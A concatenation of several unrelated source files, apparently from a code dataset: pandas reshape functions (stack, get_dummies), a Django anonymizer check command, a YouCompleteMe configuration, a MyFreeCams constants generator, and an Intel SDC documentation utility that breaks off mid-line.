new_index = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
else:
levels, (ilab, clab) = zip(*map(factorize, (frame.index,
frame.columns)))
codes = ilab.repeat(K), np.tile(clab, N).ravel()
new_index = MultiIndex(levels=levels, codes=codes,
names=[frame.index.name, frame.columns.name],
verify_integrity=False)
if frame._is_homogeneous_type:
# For homogeneous EAs, frame.values will coerce to object. So
# we concatenate instead.
dtypes = list(frame.dtypes.values)
dtype = dtypes[0]
if is_extension_array_dtype(dtype):
arr = dtype.construct_array_type()
new_values = arr._concat_same_type([
col._values for _, col in frame.iteritems()
])
new_values = _reorder_for_extension_array_stack(new_values, N, K)
else:
# homogeneous, non-EA
new_values = frame.values.ravel()
else:
# non-homogeneous
new_values = frame.values.ravel()
if dropna:
mask = notna(new_values)
new_values = new_values[mask]
new_index = new_index[mask]
return frame._constructor_sliced(new_values, index=new_index)
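# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical round trip for stack(): column labels move into the innermost
# row-index level, and unstack() reverses the operation.
def _example_stack_roundtrip():
    import pandas as pd
    df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]}, index=['one', 'two'])
    stacked = stack(df)           # same result as df.stack()
    # stacked index: ('one', 'a'), ('one', 'b'), ('two', 'a'), ('two', 'b')
    restored = stacked.unstack()  # back to the original 2x2 layout
    return stacked, restored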
def stack_multiple(frame, level, dropna=True):
# If all passed levels match up to column names, no
# ambiguity about what to do
if all(lev in frame.columns.names for lev in level):
result = frame
for lev in level:
result = stack(result, lev, dropna=dropna)
# Otherwise, level numbers may change as each successive level is stacked
elif all(isinstance(lev, int) for lev in level):
# As each stack is done, the level numbers decrease, so we need
# to account for that when level is a sequence of ints
result = frame
# _get_level_number() checks level numbers are in range and converts
# negative numbers to positive
level = [frame.columns._get_level_number(lev) for lev in level]
# Can't iterate directly through level as we might need to change
# values as we go
for index in range(len(level)):
lev = level[index]
result = stack(result, lev, dropna=dropna)
# Decrement all level numbers greater than current, as these
# have now shifted down by one
updated_level = []
for other in level:
if other > lev:
updated_level.append(other - 1)
else:
updated_level.append(other)
level = updated_level
else:
raise ValueError("level should contain all level names or all level "
"numbers, not a mixture of the two.")
return result
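# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical example for stack_multiple(): stacking two named column levels
# in one call (DataFrame.stack() is expected to dispatch here when `level`
# is a list).
def _example_stack_two_levels():
    import pandas as pd
    columns = pd.MultiIndex.from_tuples([('A', 'x'), ('A', 'y'),
                                         ('B', 'x'), ('B', 'y')],
                                        names=['upper', 'lower'])
    df = pd.DataFrame([[1, 2, 3, 4], [5, 6, 7, 8]], columns=columns)
    # Both column levels end up in the row index; the result is a Series.
    return stack_multiple(df, level=['upper', 'lower'])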
def _stack_multi_columns(frame, level_num=-1, dropna=True):
def _convert_level_number(level_num, columns):
"""
Logic for converting the level number to something we can safely pass
to swaplevel:
We generally want to convert the level number into a level name, except
when columns do not have names, in which case we must leave as a level
number
"""
if level_num in columns.names:
return columns.names[level_num]
else:
if columns.names[level_num] is None:
return level_num
else:
return columns.names[level_num]
this = frame.copy()
# this makes life much simpler
if level_num != frame.columns.nlevels - 1:
# roll levels to put selected level at end
roll_columns = this.columns
for i in range(level_num, frame.columns.nlevels - 1):
# Need to check if the ints conflict with level names
lev1 = _convert_level_number(i, roll_columns)
lev2 = _convert_level_number(i + 1, roll_columns)
roll_columns = roll_columns.swaplevel(lev1, lev2)
this.columns = roll_columns
if not this.columns.is_lexsorted():
# Workaround the edge case where 0 is one of the column names,
# which interferes with trying to sort based on the first
# level
level_to_sort = _convert_level_number(0, this.columns)
this = this.sort_index(level=level_to_sort, axis=1)
# tuple list excluding level for grouping columns
if len(frame.columns.levels) > 2:
tuples = list(zip(*[lev.take(level_codes) for lev, level_codes
in zip(this.columns.levels[:-1],
this.columns.codes[:-1])]))
unique_groups = [key for key, _ in itertools.groupby(tuples)]
new_names = this.columns.names[:-1]
new_columns = MultiIndex.from_tuples(unique_groups, names=new_names)
else:
new_columns = unique_groups = this.columns.levels[0]
# time to ravel the values
new_data = {}
level_vals = this.columns.levels[-1]
level_codes = sorted(set(this.columns.codes[-1]))
level_vals_used = level_vals[level_codes]
levsize = len(level_codes)
drop_cols = []
for key in unique_groups:
try:
loc = this.columns.get_loc(key)
except KeyError:
drop_cols.append(key)
continue
# can make more efficient?
# we almost always return a slice
# but if unsorted can get a boolean
# indexer
if not isinstance(loc, slice):
slice_len = len(loc)
else:
slice_len = loc.stop - loc.start
if slice_len != levsize:
chunk = this.loc[:, this.columns[loc]]
chunk.columns = level_vals.take(chunk.columns.codes[-1])
value_slice = chunk.reindex(columns=level_vals_used).values
else:
if (frame._is_homogeneous_type and
is_extension_array_dtype(frame.dtypes.iloc[0])):
dtype = this[this.columns[loc]].dtypes.iloc[0]
subset = this[this.columns[loc]]
value_slice = dtype.construct_array_type()._concat_same_type(
[x._values for _, x in subset.iteritems()]
)
N, K = this.shape
idx = np.arange(N * K).reshape(K, N).T.ravel()
value_slice = value_slice.take(idx)
elif frame._is_mixed_type:
value_slice = this[this.columns[loc]].values
else:
value_slice = this.values[:, loc]
if value_slice.ndim > 1:
# i.e. not extension
value_slice = value_slice.ravel()
new_data[key] = value_slice
if len(drop_cols) > 0:
new_columns = new_columns.difference(drop_cols)
N = len(this)
if isinstance(this.index, MultiIndex):
new_levels = list(this.index.levels)
new_names = list(this.index.names)
new_codes = [lab.repeat(levsize) for lab in this.index.codes]
else:
new_levels = [this.index]
new_codes = [np.arange(N).repeat(levsize)]
new_names = [this.index.name] # something better?
new_levels.append(level_vals)
new_codes.append(np.tile(level_codes, N))
new_names.append(frame.columns.names[level_num])
new_index = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
result = frame._constructor(new_data, index=new_index, columns=new_columns)
# more efficient way to go about this? can do the whole masking biz but
# will only save a small amount of time...
if dropna:
result = result.dropna(axis=0, how='all')
return result
def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False,
columns=None, sparse=False, drop_first=False, dtype=None):
"""
Convert categorical variable into dummy/indicator variables.
Parameters
----------
data : array-like, Series, or DataFrame
Data of which to get dummy indicators.
prefix : str, list of str, or dict of str, default None
        String to prepend to DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : str, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix`.
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
        Whether the dummy-encoded columns should be backed by
a :class:`SparseArray` (True) or a regular NumPy array (False).
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
.. versionadded:: 0.18.0
dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
.. versionadded:: 0.23.0
Returns
-------
DataFrame
Dummy-coded data.
See Also
--------
Series.str.get_dummies : Convert Series to dummy codes.
Examples
--------
>>> s = pd.Series(list('abca'))
>>> pd.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> s1 = ['a', 'b', np.nan]
>>> pd.get_dummies(s1)
a b
0 1 0
1 0 1
2 0 0
>>> pd.get_dummies(s1, dummy_na=True)
a b NaN
0 1 0 0
1 0 1 0
2 0 0 1
>>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]})
>>> pd.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pd.get_dummies(pd.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
>>> pd.get_dummies(pd.Series(list('abc')), dtype=float)
a b c
0 1.0 0.0 0.0
1 0.0 1.0 0.0
2 0.0 0.0 1.0
"""
from pandas.core.reshape.concat import concat
from itertools import cycle
dtypes_to_encode = ['object', 'category']
if isinstance(data, DataFrame):
# determine columns being encoded
if columns is None:
data_to_encode = data.select_dtypes(
include=dtypes_to_encode)
else:
data_to_encode = data[columns]
# validate prefixes and separator to avoid silently dropping cols
def check_len(item, name):
len_msg = ("Length of '{name}' ({len_item}) did not match the "
"length of the columns being encoded ({len_enc}).")
if is_list_like(item):
if not len(item) == data_to_encode.shape[1]:
len_msg = len_msg.format(name=name, len_item=len(item),
len_enc=data_to_encode.shape[1])
raise ValueError(len_msg)
check_len(prefix, 'prefix')
check_len(prefix_sep, 'prefix_sep')
if isinstance(prefix, compat.string_types):
prefix = cycle([prefix])
if isinstance(prefix, dict):
prefix = [prefix[col] for col in data_to_encode.columns]
if prefix is None:
prefix = data_to_encode.columns
# validate separators
if isinstance(prefix_sep, compat.string_types):
prefix_sep = cycle([prefix_sep])
elif isinstance(prefix_sep, dict):
prefix_sep = [prefix_sep[col] for col in data_to_encode.columns]
if data_to_encode.shape == data.shape:
# Encoding the entire df, do not prepend any dropped columns
with_dummies = []
elif columns is not None:
# Encoding only cols specified in columns. Get all cols not in
# columns to prepend to result.
with_dummies = [data.drop(columns, axis=1)]
else:
# Encoding only object and category dtype columns. Get remaining
# columns to prepend to result.
with_dummies = [data.select_dtypes(exclude=dtypes_to_encode)]
for (col, pre, sep) in zip(data_to_encode.iteritems(), prefix,
prefix_sep):
# col is (column_name, column), use just column data here
dummy = _get_dummies_1d(col[1], prefix=pre, prefix_sep=sep,
dummy_na=dummy_na, sparse=sparse,
drop_first=drop_first, dtype=dtype)
with_dummies.append(dummy)
result = concat(with_dummies, axis=1)
else:
result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na,
sparse=sparse,
drop_first=drop_first,
dtype=dtype)
return result
def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False,
sparse=False, drop_first=False, dtype=None):
from pandas.core.reshape.concat import concat
# Series avoids inconsistent NaN handling
codes, levels = _factorize_from_iterable(Series(data))
if dtype is None:
dtype = np.uint8
dtype = np.dtype(dtype)
if is_object_dtype(dtype):
raise ValueError("dtype=object is not a valid dtype for get_dummies")
def get_empty_frame(data):
if isinstance(data, Series):
index = data.index
else:
index = np.arange(len(data))
return DataFrame(index=index)
# if all NaN
if not dummy_na and len(levels) == 0:
return get_empty_frame(data)
codes = codes.copy()
if dummy_na:
codes[codes == -1] = len(levels)
levels = np.append(levels, np.nan)
# if dummy_na, we just fake a nan level. drop_first will drop it again
if drop_first and len(levels) == 1:
return get_empty_frame(data)
number_of_cols = len(levels)
if prefix is None:
dummy_cols = levels
else:
# PY2 embedded unicode, gh-22084
def _make_col_name(prefix, prefix_sep, level):
fstr = '{prefix}{prefix_sep}{level}'
if PY2 and (isinstance(prefix, text_type) or
isinstance(prefix_sep, text_type) or
isinstance(level, text_type)):
fstr = u(fstr)
return fstr.format(prefix=prefix,
prefix_sep=prefix_sep,
level=level)
dummy_cols = [_make_col_name(prefix, prefix_sep, level)
for level in levels]
if isinstance(data, Series):
index = data.index
else:
index = None
if sparse:
if is_integer_dtype(dtype):
fill_value = 0
elif dtype == bool:
fill_value = False
else:
fill_value = 0.0
sparse_series = []
N = len(data)
sp_indices = [[] for _ in range(len(dummy_cols))]
mask = codes != -1
codes = codes[mask]
n_idx = np.arange(N)[mask]
for ndx, code in zip(n_idx, codes):
sp_indices[code].append(ndx)
if drop_first:
# remove first categorical level to avoid perfect collinearity
# GH12042
sp_indices = sp_indices[1:]
dummy_cols = dummy_cols[1:]
for col, ixs in zip(dummy_cols, sp_indices):
sarr = SparseArray(np.ones(len(ixs), dtype=dtype),
sparse_index=IntIndex(N, ixs),
fill_value=fill_value,
dtype=dtype)
sparse_series.append(Series(data=sarr, index=index, name=col))
out = concat(sparse_series, axis=1, copy=False)
return out
else:
dummy_mat = np.eye(number_of_cols, dtype=dtype).take(codes, axis=0)
if not dummy_na:
# reset NaN GH4446
dummy_mat[codes == -1] = 0
if drop_first:
# remove first GH12042
dummy_mat = dummy_mat[:, 1:]
dummy_cols = dummy_cols[1:]
return DataFrame(dummy_mat, index=index, columns=dummy_cols)
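# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical comparison of the two branches above through the public API:
# sparse=False takes the dense np.eye() path, while sparse=True builds one
# SparseArray-backed column per level (uint8 with fill_value 0 by default).
def _example_dense_vs_sparse_dummies():
    import pandas as pd
    s = pd.Series(list('abca'))
    dense = get_dummies(s)                # dense uint8 columns
    sparse = get_dummies(s, sparse=True)  # sparse columns, zeros not stored
    return dense.dtypes, sparse.dtypes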
def make_axis_dummies(frame, axis='minor', transform=None):
"""
Construct 1-0 dummy variables corresponding to designated axis
labels
Parameters
----------
frame : DataFrame
axis : {'major', 'minor'}, default 'minor'
transform : function, default None
Function to apply to axis labels first. For example, to
get "day of week" dummies in a time series regression
you might call::
make_axis_dummies(panel, axis='major',
transform=lambda d: d.weekday())
Returns
-------
dummies : DataFrame
Column names taken from chosen axis
"""
numbers = {'major': 0, 'minor': 1}
num = numbers.get(axis, axis)
items = frame.index.levels[num]
codes = frame.index.codes[num]
if transform is not None:
mapped_items = items.map(transform)
codes, items = _factorize_from_iterable(mapped_items.take(codes))
values = np.eye(len(items), dtype=float)
values = values.take(codes, axis=0)
return DataFrame(values, columns=items, index=frame.index)
def _reorder_for_extension_array_stack(arr, n_rows, n_columns):
"""
Re-orders the values when stacking multiple extension-arrays.
The indirect stacking method used for EAs requires a followup
take to get the order correct.
Parameters
----------
arr : ExtensionArray
n_rows, n_columns : int
The number of rows and columns in the original DataFrame.
Returns
-------
taken : ExtensionArray
The original `arr` with elements re-ordered appropriately
Examples
--------
>>> arr = np.array(['a', 'b', 'c', 'd', 'e', 'f'])
>>> _reorder_for_extension_array_stack(arr, 2, 3)
array(['a', 'c', 'e', 'b', 'd', 'f'], dtype='<U1')
>>> _reorder_for_extension_array_stack(arr, 3, 2)
array(['a', 'd', 'b', 'e', 'c', 'f'], dtype='<U1')
"""
# final take to get the order correct.
# idx is an indexer like
# [c0r0, c1r0, c2r0, ...,
# c0r1, c1r1, c2r1, ...]
idx = np.arange(n_rows * n_columns).reshape(n_columns, n_rows).T.ravel()
return arr.take(idx)
| bsd-3-clause | 777,959,914,915,552,400 | 34.017208 | 79 | 0.577209 | false |
BetterWorks/django-anonymizer | anonymizer/management/commands/check_anonymizers.py | 1 | 1139 | from django.core.management import CommandError
from django.core.management.base import AppCommand
from anonymizer.utils import get_anonymizers
try:
unicode
except NameError:
unicode = str # python 3
class Command(AppCommand):
def add_arguments(self, parser):
parser.add_argument('args', metavar='app_label', nargs='+',
help='One or more app names.')
def handle_app_config(self, app_config, **options):
anonymizers = get_anonymizers(app_config)
models = set()
errors = []
for klass in anonymizers:
models.add(klass.model)
instance = klass()
try:
instance.validate()
except ValueError as e:
errors.append(unicode(e))
for model in app_config.get_models():
if model._meta.abstract or model._meta.proxy:
continue
if model not in models:
errors.append(u'need anonymizer for %s' % model)
if errors:
raise CommandError('%d errors\n%s' % (len(errors), '\n'.join(errors)))
return 0
| mit | 3,961,398,319,339,451,400 | 28.205128 | 82 | 0.579456 | false |
Cyberdr8gon/matviz | .ycm_extra_conf.py | 1 | 5050 | # Generated by YCM Generator at 2017-02-03 10:06:47.051388
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c++',
'-DGTEST_HAS_PTHREAD=1',
'-I/home/sam/workspace/matviz/include',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googlemock',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googlemock/include',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googletest',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googletest/include',
'-isystem /usr/include',
'-std=c++14'
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
  # The compile_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| gpl-3.0 | 7,470,624,663,713,526,000 | 33.827586 | 79 | 0.705743 | false |
ZombieAlex/MFCAuto | src/main/genConstants.py | 1 | 3164 | import re
from urllib.request import urlopen
import json
serverConfig = "https://www.myfreecams.com/_js/serverconfig.js"
url = "https://www.myfreecams.com/_js/mfccore.js"
# Maybe it's wrong to merge in the w. stuff? Is that all just for the UI?
constantRe = re.compile(r'(\s|;?|,)(FCS|w)\.([A-Z0-9]+)_([A-Z0-9_]+)\s+?=\s+?([0-9]+);')
constantMap = dict()
header = """// Various constants and enums used by MFC. Most of these values can be seen here:
// http://www.myfreecams.com/_js/mfccore.js
export const MAGIC = -2027771214;
export const FLASH_PORT = 8100;
export const WEBSOCKET_PORT = 8080;
// STATE is essentially the same as FCVIDEO but has friendly names
// for better log messages and code readability
export enum STATE {
FreeChat = 0, // TX_IDLE
// TX_RESET = 1, // Unused?
Away = 2, // TX_AWAY
// TX_CONFIRMING = 11, // Unused?
Private = 12, // TX_PVT
GroupShow = 13, // TX_GRP
// TX_RESERVED = 14, // Unused?
// TX_KILLMODEL = 15, // Unused?
// C2C_ON = 20, // Unused?
// C2C_OFF = 21, // Unused?
Online = 90, // RX_IDLE
// RX_PVT = 91, // Unused?
// RX_VOY = 92, // Unused?
// RX_GRP = 93, // Unused?
// NULL = 126, // Unused?
Offline = 127, // OFFLINE
}
// Version number to pass along with our
// FCTYPE_LOGIN login requests
//
// The latest Flash version number is here:
// https://www.myfreecams.com/js/wsgw.js
// The latest WebSocket version number is here:
// http://m.myfreecams.com/source.min.js
export enum LOGIN_VERSION {
FLASH = 20071025,
WEBSOCKET = 20080910,
}
"""
#Add our own constants...
constantMap.setdefault("FCTYPE", dict())["CLIENT_MANUAL_DISCONNECT"] = -6
constantMap.setdefault("FCTYPE", dict())["CLIENT_DISCONNECTED"] = -5
constantMap.setdefault("FCTYPE", dict())["CLIENT_MODELSLOADED"] = -4
constantMap.setdefault("FCTYPE", dict())["CLIENT_CONNECTED"] = -3
constantMap.setdefault("FCTYPE", dict())["ANY"] = -2
constantMap.setdefault("FCTYPE", dict())["UNKNOWN"] = -1
with urlopen(url) as data:
scriptText = data.read().decode('utf-8')
result = constantRe.findall(scriptText)
for (prefix1, prefix2, fctype, subtype, num) in result:
constantMap.setdefault(fctype, dict())[subtype] = num
with open("Constants.ts", "w") as f:
f.write(header)
for fctype in sorted(constantMap):
f.write("\nexport enum {} {{\n".format(fctype))
for subtype, value in sorted(constantMap[fctype].items(), key=lambda x: int(x[1])):
f.write(' "{}" = {},\n'.format(subtype, value))
f.write("}\n")
with urlopen(serverConfig) as configData:
configText = configData.read().decode('utf-8')
config = json.loads(configText)
configText = json.dumps(config, indent=4, sort_keys=True)
f.write("\n// tslint:disable:trailing-comma\n")
f.write("export const CACHED_SERVERCONFIG = {}".format(configText))
f.write(";\n// tslint:enable:trailing-comma\n")
print("Done")
| mit | 4,662,721,920,012,275,000 | 38.061728 | 95 | 0.599874 | false |
IntelLabs/hpat | docs/source/buildscripts/sdc_object_utils.py | 1 | 16472 | # -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from inspect import getmembers, ismodule, isclass, isfunction
import sys
import pandas
import sdc
from sdc_doc_utils import is_sdc_user_guide_header, get_docstring, split_title, extract_pandas_name_from
# -- Pandas submodules to be excluded from API Reference ---------------------------------------------
exclude_pandas_submodules = [
'pandas.compat', # This is PRIVATE submodule
'pandas.util', # This is PRIVATE submodule
'pandas.api.extensions', # This is extension for library developers extending Pandas
'pandas.testing', # Utility functions for testing. Not a priority for SDC
'pandas.plotting', # Plotting functions. Not a priority for compiling with SDC
'pandas.errors', # Error handling functionality. Not a priority for SDC
'pandas.api.types', # Not a priority for SDC
'pandas.io.formats.style', # Helps to style dataframes with HTML and CSS. Not a priority for SDC
'pandas.arrays', # Array extensions for Numpy. We do not explicitly cover in SDC documentation now
'pandas.tseries', # SDC does not yet support Time Series objects
'pandas.core.dtypes.dtypes',
]
# -- Intel SDC submodules to be excluded from API Reference -------------------------------------------
exclude_sdc_submodules = [
'sdc.chiframes',
'sdc.compiler',
'sdc.config',
'sdc.io.pio',
'sdc.io.pio_api',
'sdc.io.pio_lower',
'sdc.utilities.utils',
'sdc.utilities.sdc_typing_utils',
'sdc.hstr_ext',
'sdc.datatypes.common_functions',
'sdc.datatypes.hpat_pandas_dataframe_pass',
'sdc.decorators',
'sdc.dict_ext',
'sdc.hdict_ext',
'sdc.distributed',
'sdc.distributed_api',
'sdc.transport_seq',
'sdc.distributed_lower',
'sdc.hdist',
'sdc.distributed_analysis',
'sdc.hdatetime_ext',
'sdc.hiframes',
'sdc.io.csv_ext',
'sdc.hio',
'sdc.hiframes.join',
'sdc.io.parquet_pio',
'sdc.parquet_cpp',
'sdc.shuffle_utils',
'sdc.str_arr_ext',
'sdc.str_ext',
'sdc.timsort',
]
pandas_modules = dict() # Dictionary of pandas submodules and their classes and functions
sdc_modules = dict() # Dictionary of Intel SDC submodules and their classes and functions
pandas_sdc_dict = dict() # Dictionary {<pandas_obj>: <sdc_obj>} that maps Pandas API to respective Intel SDC API
def get_sdc_object(pandas_obj):
"""
Returns corresponding Intel SDC object for a given Pandas object pandas_obj.
:param pandas_obj: Pandas object to be matched with Intel SDC object
:return: Intel SDC object corresponding to pandas_obj
"""
if pandas_obj in pandas_sdc_dict:
return pandas_sdc_dict[pandas_obj]
else:
return None # There is no match in Intel SDC to pandas_obj
def get_sdc_object_by_pandas_name(pandas_name):
"""
Returns corresponding Intel SDC object for a given Pandas object given as string ``pandas_name``.
This function is needed because :func:`get_sdc_object` cannot uniquely match Intel SDC and Pandas objects.
    For example, the same Pandas object represents the :meth:`Series.get` and :meth:`DataFrame.get` methods. As a result,
    :func:`get_sdc_object` will return **some** SDC object that matches the respective Pandas object. If you need
    a unique match between Pandas and Intel SDC, use the :func:`get_sdc_object_by_pandas_name` function instead
    (which should be the case for the majority of use cases).
:param pandas_name: Pandas object to be matched with Intel SDC object
:return: Intel SDC object corresponding to Pandas object having ``pandas_name`` name
"""
if pandas_name in pandas_sdc_dict:
return pandas_sdc_dict[pandas_name]
else:
return None # There is no match in Intel SDC to pandas_obj
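# --- Illustrative sketch, not part of the original module --------------------
# Intended lookup flow, assuming the init_* functions defined below have been
# called first.  The key format ('pandas.Series.get' here) is an assumption
# based on the docstrings above; unknown APIs simply return None.
def _example_lookup_sdc_counterpart():
    init_pandas_structure()
    init_sdc_structure()
    init_pandas_sdc_dict()
    return get_sdc_object_by_pandas_name('pandas.Series.get')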
def init_pandas_sdc_dict():
"""
Initializes global dictionary that performs mapping between Pandas objects and SDC objects.
    To function correctly, this function must be called after the ``sdc_modules`` and ``pandas_modules``
    structures have been initialized by the :func:`init_sdc_structure` and :func:`init_pandas_structure` functions respectively.
"""
def _map_sdc_to_pandas(sdc_obj):
if isfunction(sdc_obj):
doc = get_docstring(sdc_obj)
# The very first section of Intel SDC documentation is expected to start with
# the User Guide header followed by the name of respective Pandas API.
# The following code extracts respective Pandas API
title, text = split_title(doc)
if is_sdc_user_guide_header((title, text)):
pandas_name = extract_pandas_name_from(text)
pandas_obj = get_obj(pandas_name)
pandas_sdc_dict[pandas_obj] = sdc_obj
pandas_sdc_dict[pandas_name] = sdc_obj
return False
global pandas_sdc_dict
pandas_sdc_dict = {}
traverse(sdc_modules, _map_sdc_to_pandas, True)
def get_obj(obj_name):
"""
Retrieves object corresponding to fully qualified name obj_name.
    The fully qualified name starts with the imported module name visible in ``sys.modules``, followed by
    submodules, then classes, and finally class attributes.
:param obj_name: Fully qualified object name string
:return: If found, returns the object corresponding to obj_name. Otherwise raises exception
    :raises AttributeError: If a submodule or attribute does not exist
"""
split_name = obj_name.split('.')
split_obj = sys.modules[split_name[0]]
# Iterate through submodules
while ismodule(split_obj) and len(split_name) > 1:
split_name.pop(0)
not_found = True
for (name, obj) in getmembers(split_obj): # Go through members of split_obj
if split_name[0] == name:
not_found = False
break
if not_found:
            raise AttributeError('Member `' + split_name[0] + '` for `' + obj_name + '` does not exist')
split_obj = obj
split_name.pop(0)
for name in split_name:
split_obj = getattr(split_obj, name)
return split_obj
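# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical use of get_obj(): resolving fully qualified names into live
# objects (pandas is already imported at the top of this module).
def _example_get_obj():
    series_cls = get_obj('pandas.Series')      # the class object
    sum_method = get_obj('pandas.Series.sum')  # an attribute of that class
    return series_cls, sum_method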
def get_class_methods(cls):
"""
Returns the list of class methods, accessible by both names and as objects.
Function ignores internal methods starting with ``_``.
:param cls: The class object
:return: List of class methods, each item is the tuple ``(method_name, method_object)``
"""
return [(func, getattr(cls, func)) for func in dir(cls)
